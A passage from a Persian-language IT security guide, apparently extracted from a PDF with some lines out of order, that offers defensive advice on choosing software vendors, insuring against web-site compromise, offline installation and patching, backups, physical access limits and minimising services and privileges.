ﺍﺭﺯﻳﺎﺑﻲ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ؛ ﭼﺮﺍﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﭼﻨﺪﺍﻥ ﻗﺎﺑﻞ ﺍﺳﺘﻨﺎﺩ ﻧﺒﺎﺷﻨﺪ(.
ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﺴﺒﺖ ﺑﻪ ﮔﺰﺍﺭﺵ ﻣﺸﻜﻼﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﻭ ﻳﺎ ﻛﺎﺭﺁﻳﻲ ﻣﺤﺼﻮﻻﺗـﺸﺎﻥ ﭼﮕﻮﻧـﻪ ﻭﺍﻛـﻨﺶ •
ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ .ﺁﻳﺎ ﻓﺮﻭﺷﻨﺪﺓ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑﻪ ﭼﻨﻴﻦ ﮔﺰﺍﺭﺷﺎﺗﻲ ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﺪ؟ ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺮﺧﻲ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﻋﺘﺮﺍﺿـﺎﺕ ﻛـﺎﺭﺑﺮﺍﻥ
ﺭﺍ ﻧﺎﺩﻳﺪﻩ ﻣﻲﮔﻴﺮﻧﺪ ،ﻣﮕﺮ ﺁﻧﻜﻪ ﺍﻧﻌﻜﺎﺱ ﻣﻄﺒﻮﻋﺎﺗﻲ ﺁﻥ ﺑﺴﻴﺎﺭ ﻧﺎﻣﻄﻠﻮﺏ ﺑﺎﺷﺪ.
ﺑﺒﻴﻨﻴﺪ ﻓﺮﻭﺷﻨﺪﺓ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑﻪ ﻃﺮﺍﺣﻲ ﻣﻨﺎﺳﺐ ﺑﺎ ﻣﻌﻴﺎﺭﻫﺎﻳﻲ ﭼﻮﻥ ﺍﻣﻨﻴﺖ ،ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ،ﻭ ﻭﺍﺳـﻄﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﻣﻨﺎﺳـﺐ ﭼﻘـﺪﺭ •
ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﺪ .ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻘﺎﻭﻡ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ ﻭ ﺍﺷﺘﺒﺎﻫﺎﺕ ﻛﺎﺭﺑﺮ ،ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺩ ﺩﺭ ﺷﺮﺍﻳﻂ ﺣﺴﺎﺱ ﻣﻨﺎﺳﺒﺘﺮ ﻫﺴﺘﻨﺪ.
ﻣﺸﺨﺺ ﻛﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﺑﻬﺘﺮ ﺍﺳﺖ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻗﺪﻳﻤﻲ ﻛﻪ ﻣﺸﻜﻼﺕ ﺁﻧﻬﺎ ﺗﻘﺮﻳﺒﹰﺎ ﻣﺸﺨﺺ ﻫﺴﺘﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨـﺪ ،ﻳـﺎ •
ﺁﺧﺮﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺎﺯﺍﺭ ﻛﻪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺟﺪﻳﺪﺗﺮﻱ ﺩﺭ ﺁﻧﻬﺎ ﻋﺮﺿﻪ ﻣﻲﺷﻮﺩ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﺩ.
ﺳﻴﺴﺘﻤﻲ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ﻛﻪ ﺑﺎ ﻛﻤﺘﺮﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ،ﺗﻤﺎﻡ ﻛﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺷﻤﺎ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺭﺍ ﺑﻪ ﻧﺤﻮ ﺍﺣﺴﻦ ﺍﻧﺠﺎﻡ ﺩﻫﺪ .ﺳﺨﺖﺍﻓﺰﺍﺭ ﻧـﺴﺒﺘﹰﺎ •
ﺍﺭﺯﺍﻥ ﺍﺳﺖ؛ ﻣﻤﻜﻦ ﺍﺳﺖ ﺧﺮﻳﺪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺠﺰﺍ ﺑﺮﺍﻱ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻥ ﺑﻪ ﻳﻚ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺣﺪﺍﻗﻠﻲ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ ،ﻧـﺴﺒﺖ
ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺸﺎﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ -ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻨﺠﺮ ﺑﻪ ﺑﺮﻭﺯ ﻧﻘﺼﻬﺎﻱ ﺍﻧﺒﻮﻩ
ﺷﻮﺩ -ﮔﺰﻳﻨﺔ ﺑﻬﺘﺮﻱ ﺑﺎﺷﺪ.
ﺩﺭ ﺍﻳﻨﺠﺎ ﺑﻪ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺑﺮﺍﻱ ﺧﺮﻳﺪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻭ ﺳﻴﺴﺘﻤﻬﺎ ﻻﺯﻡ ﻫﺴﺘﻨﺪ ﺍﺷﺎﺭﻩ ﻣﻲﺷﻮﺩ:
ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺻﺤﻴﺢ ﺍﻟﮕﻮﻫﺎﻱ ﻣﻮﻓﻖ ﻣﻬﻨﺪﺳﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﻃﺮﺍﺣﻲ ،ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ،ﻭ ﺁﺯﻣﺎﻳﺶ ﻧﺮﻡﺍﻓﺰﺍﺭ. •
ﻣﺴﺘﻨﺪﺍﺗﻲ ﻛﻪ ﻧﺘﺎﻳﺞ ﺁﺯﻣﺎﻳﺶ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﻣﺸﺎﺑﻪ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺭﺍ ﻧﺸﺎﻥ ﺩﻫﻨﺪ .ﺩﺭ ﺣﺎﻟﺖ ﺍﻳﺪﻩﺁﻝ ،ﺍﻳﻦ ﺁﺯﻣﺎﻳﺶ ﺑﺎﻳـﺪ ﻫـﻢ •
ﺷﺎﻣﻞ ﺁﺯﻣﻮﻥ ﻋﻤﻠﻜﺮﺩ ﻭ ﻫﻢ ﺷﺎﻣﻞ ﺁﺯﻣﻮﻥ ﻛﺎﺭﺁﻳﻲ ﺩﺭ ﺷﺮﺍﻳﻂ ﺑﺤﺮﺍﻧﻲ ﺑﺎﺷﺪ.
ﻳﻚ ﮔﺰﺍﺭﺵ ﻣﻜﺘﻮﺏ ﺍﺯ ﺳﻴﺎﺳﺖ ﻓﺮﻭﺷﻨﺪﻩ ﺑﺮﺍﻱ ﭘﺬﻳﺮﺵ ،ﻣﺴﺘﻨﺪ ﻛﺮﺩﻥ ،ﻭ ﻭﺍﻛﻨﺶ ﺑﻪ ﮔﺰﺍﺭﺷﺎﺕ ﺩﺭﻳﺎﻓﺘﻲ ﺍﺯ ﺍﺷﻜﺎﻻﺕ ﻣﺤﺼﻮﻝ. •
ﻳﻚ ﮔﺰﺍﺭﺵ ﻣﻜﺘﻮﺏ ﺍﺯ ﺧﻂﻣﺸﻲ ﻓﺮﻭﺷﻨﺪﻩ ﺩﺭ ﺍﻋﻼﻡ ﺍﺷﻜﺎﻻﺕ ﺟﺪﻳﺪ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﻣﺸﺘﺮﻳﺎﻥ ﻭ ﻓﺮﺁﻳﻨﺪ ﺭﻓـﻊ ﺁﻧﻬـﺎ) .ﻣـﺴﺌﻮﻟﻴﺖﭘـﺬﻳﺮﺗﺮﻳﻦ •
ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺗﻴﻤﻬﺎﻱ FIRSTﻭ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ ﻣﺸﺘﺮﻳﺎﻥ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ ،ﻭ ﻓﺮﻭﺷﻨﺪﮔﺎﻧﻲ ﻛﻪ ﺍﺣﺴﺎﺱ ﻣﺴﺌﻮﻟﻴﺖ ﻛﻤﺘـﺮﻱ ﻣـﻲﻛﻨﻨـﺪ
ﻫﻴﭽﮕﺎﻩ ﺍﺷﻜﺎﻻﺕ ﻭ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺭﻓﻊ ﺁﻧﻬﺎ ﺭﺍ ﺍﻃﻼﻉ ﻧﻤﻲﺩﻫﺪ ﻭ ﻳﺎ ﺩﺭ ﻛﻨﺎﺭ ﺍﺷﻜﺎﻻﺕ ﺍﻋﻼﻡﺷﺪﺓ ﺳﺎﻳﺮ ﺑﺮﻧﺎﻣﻪﻫﺎ ،ﺍﺷﻜﺎﻻﺕ ﺭﺍ ﺩﺭ ﻣﻜﺎﻧﻬـﺎﻱ ﻣـﺒﻬﻢ ﻭ ﻏﻴﺮﻗﺎﺑـﻞ
ﺍﻃﻤﻴﻨﺎﻥ ﭘﻨﻬﺎﻥ ﻣﻲﻛﻨﻨﺪ(.
ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﺍﻃﻼﻋﻴﻪﻫﺎﻱ ﭘﻴﺸﻴﻦ ﻭ ﺍﺷﻜﺎﻻﺕ ﺭﻓﻊﺷﺪﻩ. •
٣٥١ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺍﮔﺮﭼﻪ ﺻﻨﻌﺖ ﺭﺍﻳﺎﻧﻪ ﻣﺪﺕ ﺍﻧﺪﻛﻲ ﺍﺳﺖ ﻛﻪ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ ﺭﺍ ﺟﺪﻱ ﻣﻲﮔﻴﺮﺩ ،ﺍﻣﺎ ﻫـﻴﭻ ﻓﺮﻭﺷـﻨﺪﻩﺍﻱ -ﺣﺘـﻲ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﻣﺤـﺼﻮﻻﺕ
ﺍﻣﻨﻴﺘﻲ ﻫﻢ -ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑﺮ ﺁﺳﻴﺒﻬﺎﻱ ﻧﺎﺷﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺑﻴﻤﻪ ﻧﻤﻲﻛﻨﻨـﺪ .ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺗﻨﻬـﺎ ﺗﻌـﺪﺍﺩ ﺍﻧـﺪﻛﻲ ﺍﺯ
ﺷﺮﻛﺘﻬﺎﻱ ﺑﻴﻤﻪ ،ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺗﻨﻈﻴﻢ ﺑﻴﻤﻪﻧﺎﻣﻪﻫﺎﻳﻲ ﺩﺭ ﻗﺒﺎﻝ ﺧﻄﺮﺍﺕ ﻧﺎﺷﻲ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺗﻐﻴﻴـﺮﺍﺕ ﻧﺎﺧﻮﺍﺳـﺘﺔ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻭﺏ
ﺗﺪﻭﻳﻦ ﻛﺮﺩﻩﺍﻧﺪ .ﺷﻤﺎ ﺑﺎﻳﺪ ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﺗﺎ ﻣﺘﻮﺟﻪ ﺷﻮﻳﺪ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺘﻔﺎﻭﺕ ،ﭼﻪ ﺑﻴﻤﻪﻧﺎﻣﻪﻫـﺎﻳﻲ ﻭﺟـﻮﺩ
ﺩﺍﺭﺩ .ﻫﺮﭼﻪ ﺯﻣﺎﻥ ﺑﻴﺸﺘﺮﻱ ﺑﮕﺬﺭﺩ ،ﺑﻴﻤﻪﻧﺎﻣﻪﻫﺎ ﺑﺮﺍﻱ ﻛﺎﺭﺁﺗﺮ ﺑﻮﺩﻥ ﺩﺭ ﭘﻴﻜﺮﺑﻨﺪﻳﻬﺎﻳﻲ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﻛﻤﺘـﺮﻱ ﻣـﻲﺷـﻮﻧﺪ ﺗﻜﺎﻣـﻞ
١٩٨
ﻣﻲﻳﺎﺑﻨﺪ )ﻭ ﻟﺬﺍ ﻣﺸﺘﺮﻳﺎﻥ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧﺪﻣﺎﺕ ﻣﺨﺘﻠﻒ ﺁﻧﺎﻥ ﺣﻖ ﺑﻴﻤﺔ ﻛﻤﺘﺮﻱ ﭘﺮﺩﺍﺧﺖ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ(.
ﻲ ﺑﻪﻇﺎﻫﺮ ﻣﻄﻤﺌﻦ ﻗﺮﺍﺭ ﻣـﻲﺩﻫﻨـﺪ ﺑـﺴﻴﺎﺭ ﺯﻳـﺎﺩ ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺗﻌﺪﺍﺩ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ ﺑﺮﺍﻱ ﻛﺎﺭ ﺭﺍ ﺗﻨﻬﺎ ﺭﻭﻱ ﻧﺴﺨﻪﻫﺎﻱ ﭼﺎﭘ ﹺ
ﻻ ﺁﺧﺮﻳﻦ ﺛﺒﺘﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﺓ ﭘﻴﺶ ﺍﺯ ﻭﻗﻮﻉ ﻳﻚ ﺭﺧﺪﺍﺩ ،ﺍﺧﻄﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻪ ﻫﻤـﺔ ﺑﺮﮔـﻪﻫـﺎﻱ ﺛﺒﺘـﻲ ﻛـﻪ ﺍﺳﺖ .ﻣﻌﻤﻮ ﹰ
ﺑﻮﺳﻴﻠﺔ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻳﺎ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ ﻳﻚ ﻧﮕﺎﻩ ﺍﺟﻤﺎﻟﻲ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻧﻜﺘﻪﺍﻱ ﺍﺯ ﻗﻠﻢ ﻧﻴﺎﻓﺘﺎﺩﻩ ﺍﺳﺖ.
۱۹۸ﺩﺭ ﺍﻭﺍﺧﺮ ﺳﺎﻝ ،۲۰۰۱ﺣﺪﺍﻗﻞ ﻳﻚ ﺷﺮﻛﺖ ﺑﻴﻤﻪ ﺍﺯ ﻣﺸﺘﺮﻳﺎﻧﻲ ﻛﻪ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺑﺎ ﺑﺴﺘﺮ Windows NTﻭ Microsoft IISﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻧﺪ ،ﺣﻖ ﺑﻴﻤﺔ
ﺑﻴﺸﺘﺮﻱ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﺮﺩ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٥٢
ﺍﮔﺮ ﺑﺘﻮﺍﻧﻴﺪ ﺑﺎﻳﺪ ﺩﺭ ﺍﺑﺘﺪﺍﻱ ﻓﺮﺁﻳﻨﺪ ﻧﺼﺐ ،ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﻗﻄﻊ ﻛﻨﻴﺪ ﻭ ﺗﺎ ﺗﻤﺎﻡ ﺷﺪﻥ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ،ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻧﻜﻨﻴﺪ ،ﺍﻣﺎ
ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻧﺠﺎﻡ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻭ ﻧﺼﺐ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺪﻭﻥ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﻭﺯ ﺑﻪ ﺭﻭﺯ ﺳﺨﺖﺗﺮ ﻣﻲﺷـﻮﺩ .ﻣـﻮﺍﺭﺩ ﺯﻳـﺎﺩﻱ ﮔـﺰﺍﺭﺵ
ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺭﺍﻳﺎﻧﻪﻫﺎ ﭘﺲ ﺍﺯ ﻧﺼﺐ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﭘﻴﺶ ﺍﺯ ﻧﺼﺐ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ.
ﻭﻗﺘﻲ ﺍﺯ ﻣﺘﺼﻞ ﻧﺒﻮﺩﻥ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻄﻤﺌﻦ ﺷﺪﻳﺪ ،ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ،ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ،ﻭ ﺳﭙﺲ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﻭ
ﺍﺭﺗﻘﺎﻫﺎﻱ ﺁﻧﻬﺎ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴﺪ .ﺗﻤﺎﻡ ﺍﻋﻤﺎﻝ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺩﻓﺘﺮﭼﻪﺍﻱ ﻛﻪ ﻫﻤﻮﺍﺭﻩ ﺩﺭ ﺩﺳﺘﺮﺳﺘﺎﻥ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﺑـﻪ ﺛﺒـﺖ ﺑﺮﺳـﺎﻧﻴﺪ .ﭼﻨـﻴﻦ ﺛﺒﺘﻬـﺎﻳﻲ
ﺧﺼﻮﺻﹰﺎ ﺯﻣﺎﻧﻲ ﻣﻔﻴﺪ ﻭﺍﻗﻊ ﺧﻮﺍﻫﻨﺪ ﺷﺪ ﻛﻪ ﺑﺨﻮﺍﻫﻴﺪ ﭼﻨﺪﻳﻦ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻧﺼﺐ ﻭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻴﺪ ﻭ ﻣﺎﻳـﻞ ﺑﺎﺷـﻴﺪ ﺭﻭﺯﻱ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ ﺑـﻪ
ﺩﻳﮕﺮﺍﻥ ﻭﺍﮔﺬﺍﺭﻳﺪ.
ﭘﺲ ﺍﺯ ﺍﻧﺠﺎﻡ ﻫﻤﺔ ﺍﻳﻦ ﻛﺎﺭﻫﺎ ﻭ ﭘﻴﺶ ﺍﺯ ﺍﻧﺠﺎﻡ ﻫﺮ ﻛﺎﺭ ﺩﻳﮕﺮ ،ﺑﺎﻳﺪ ﻳﻚ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺍﺯ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪ ﺗﻬﻴﻪ ﻛﻨﻴـﺪ .ﺍﮔـﺮ ﭘـﻴﺶ ﺍﺯ
ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﻣﺮﺣﻠﻪ ،ﺭﺍﻳﺎﻧﻪ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻣﻬﺎﺟﻢ ﻣﻮﺭﺩ ﺗﻬﺎﺟﻢ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ ،ﺍﻳﻦ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻤﺎﻡ ﺍﺭﺯﺵ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺧﻮﺍﻫـﺪ ﺩﺍﺩ.
ﻲ ﻻﺯﻡ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ .ﭘﺲ ﺍﺯ ﺍﻳﻦ ﺍﻣﺮ ﺑﺎﻳﺪ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺩﻭﻡ ﺭﺍ
ﭘﺲ ﺗﻬﻴﺔ ﺍﻭﻟﻴﻦ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻫﺮﮔﻮﻧﻪ ﺗﻨﻈﻴﻤﺎﺕ ﺍﺧﺘﺼﺎﺻ ﹺ
ﺍﺯ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﻳﻚ ﻧﻮﺍﺭ ﻳﺎ ﺩﻳﺴﻚ ﻓﺸﺮﺩﺓ ﻣﺘﻔﺎﻭﺕ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ.
ﺩﺭ ﭘﺎﻳﺎﻥ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺧﺮﻳﺪﺍﺭﻱﺷﺪﻩ ﻭ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺩﺭ ﻣﺤﻠﻲ ﺍﻣﻦ ﺫﺧﻴﺮﻩ ﺷﺪﻩﺍﻧـﺪ؛ ﻭ ﺩﺳﺘﺮﺳـﻲ ﻓﻴﺰﻳﻜـﻲ ﺑـﻪ
ﺭﺍﻳﺎﻧﻪ ﻣﺤﺪﻭﺩ ﺷﺪﻩ ﺍﺳﺖ .ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﺩﻳﺴﻚ ﻓﻼﭘﻲ ﻳﺎ ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺑﺮﺩﺍﺭﻳﺪ ﺗﺎ ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﺩﺭ
ﺑﺎﺯﺓ ﺯﻣﺎﻧﻲ ﻛﻮﺗﺎﻫﻲ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺩﺍﺭﺩ ،ﺑﺮﺍﻱ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺑﺎ ﻣﺸﻜﻞ ﻣﻮﺍﺟﻪ ﺷﻮﺩ.
ﺩﺳﺘﺮﺳﻲ ﭘﻴﺶﺳﺎﺧﺘﻪ ٢٠٠ﻫﻤﺮﺍﻩ ﻫﺴﺘﻨﺪ .ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﺮﺍﻱ ﻣﺴﺪﻭﺩ ﻛﺮﺩﻥ ﻛﻠﻴﺔ ﺗﺮﺍﻓﻴﻚ ﻳﻚ ﻳﺎ ﭼﻨـﺪ ﭘـﻮﺭﺕ ﻣـﻮﺭﺩ ﻧﻈـﺮ
ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻭ ﺑﻪ ﻫﻤﺎﻥ ﻧﺘﺎﻳﺠﻲ ﺑﺮﺳﻴﺪ ﻛﻪ ﺑﺎ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻥ ﺳﺮﻭﻳﺲ ﺑﻪ ﺁﻥ ﻣﻲﺭﺳﻴﺪﻳﺪ) .ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺩﺭ ﻗـﺴﻤﺖ ﺗﻨﻈﻴﻤـﺎﺕ
ﭘﻴﺸﺮﻓﺘﺔ TCP/IPﺩﺭ ،Control Panelﺍﺯ ﻗﺎﺑﻠﻴﺖ ﻏﺮﺑﺎﻝﺳﺎﺯﻱ IPﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ(.
ﺭﻭﺵ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻥ ﺧﺪﻣﺎﺕ ،ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻥ ﺩﺳﺘﺮﺳﻴﻬﺎ ﺍﺳﺖ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑﺎ ﺁﻧﻬﺎ ﻻﺯﻡ ﻧﻴﺴﺖ
ﺍﺯ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺍﺑﺮﻛﺎﺭﺑﺮ ﻳﺎ administratorﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ ،ﻧﺒﺎﻳﺪ ﺑﺎ ﺍﻳﻦ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ؛ ﻭ ﺩﺭﻋـﻮﺽ
ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﺑﻪ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﺍﻳﻦ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﺑﺎﻳﺪ ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺍﺯ ﺍﻳﻦ ﺩﺳﺘﺮﺳﻴﻬﺎ ﺑﺮﺧﻮﺭﺩﺍﺭ ﮔﺮﺩﻧـﺪ .ﺩﺭ
